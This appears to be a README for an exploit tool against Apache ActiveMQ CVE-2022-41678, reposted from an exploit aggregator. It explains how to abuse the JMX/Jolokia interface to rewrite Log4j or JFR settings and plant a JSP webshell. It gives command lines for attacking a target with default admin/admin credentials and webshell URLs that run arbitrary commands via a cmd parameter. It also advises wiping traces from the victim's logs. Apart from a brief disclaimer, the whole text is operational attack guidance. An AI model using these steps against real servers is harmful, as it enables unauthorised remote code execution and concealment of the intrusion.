Share
## https://sploitus.com/exploit?id=0C689166-CD87-52DE-B05C-72DB598155C2
# Apache ActiveMQ CVE-2022-41678 Vulnerability Exploitation Tool

## Vulnerability Overview

Reference document: https://app.nextcyber.cn/courses/41/tasks/580

CVE-2022-41678 is a remote code execution vulnerability in Apache ActiveMQ. This vulnerability allows attackers to modify Log4j or JFR configurations through the JMX (Java Management Extensions) interface, thereby writing malicious JSP webshells into the server’s web directory. This leads to remote code execution. This vulnerability affects multiple versions of Apache ActiveMQ; the specific affected versions depend on the usage of Log4j and JFR configurations.

## Environment Requirements

- Python 3.6 or higher
- Required dependencies:
  ```bash
  pip install requests
  ```
- The target ActiveMQ server must have the JMX interface enabled (usually accessed via /api/jolokia/)
- Attackers need to know the username and password of the ActiveMQ console (default: admin/admin)

## Usage

### Basic Usage

Use the default admin/admin credentials and the automatically detected exploitation method:

```bash
python exp.py http://target:8161
```

### Specifying Credentials

When the target ActiveMQ console uses custom credentials:

```bash
# Using Log4j
python poc.py -u admin -p admin http://192.168.2.47:8161
```

```bash
# Using JFR
python poc.py -u admin -p admin --exploit jfr http://192.168.2.47:8161
```

### Verifying Exploitation Results

After successful exploitation, commands can be executed by accessing the following URLs:

```
# Webshell written using Log4j
http://target:8161/admin/shell.jsp?cmd=command

# Webshell written using JFR
http://target:8161/admin/shelljfr.jsp?cmd=command
```

For example, to execute the `id` command:
```
http://target:8161/admin/shell.jsp?cmd=id
```

## Tool Parameters

| Parameter | Abbreviation | Type | Default Value | Description |
|----------|--------------|------|-------------|------------|
| `--username` | `-u` | String | `admin` | Username of the ActiveMQ console |
| `--password` | `-p` | String | `admin` | Password of the ActiveMQ console |
| `--exploit` | `-e` | String | `auto` | Exploitation method (options: auto, log4j, jfr) |
| `url` | - | String | - | URL address of the target ActiveMQ (required parameter) |

## Notes

1. This tool is intended only for security research and authorized testing purposes. Do not use it on unauthorized systems.
2. After successful exploitation, the tool will attempt to restore the original Log4j configuration to minimize the impact on the target system.
3. If the target system has network access restrictions, you may need to adjust network configurations to ensure access to the target’s JMX interface.
4. Different versions of ActiveMQ may have different paths and configurations. You may need to adjust the tool’s parameters based on actual conditions.
5. The tool uses the JMX interface for operations. Make sure the target ActiveMQ server has this interface enabled.
6. Running this tool may generate logging records on the target system. Be sure to clean up any traces after completion.

[source-iocs-preserved url=http://target:8161/admin/shell.jsp?cmd=命令,http://target:8161/admin/shelljfr.jsp?cmd=命令]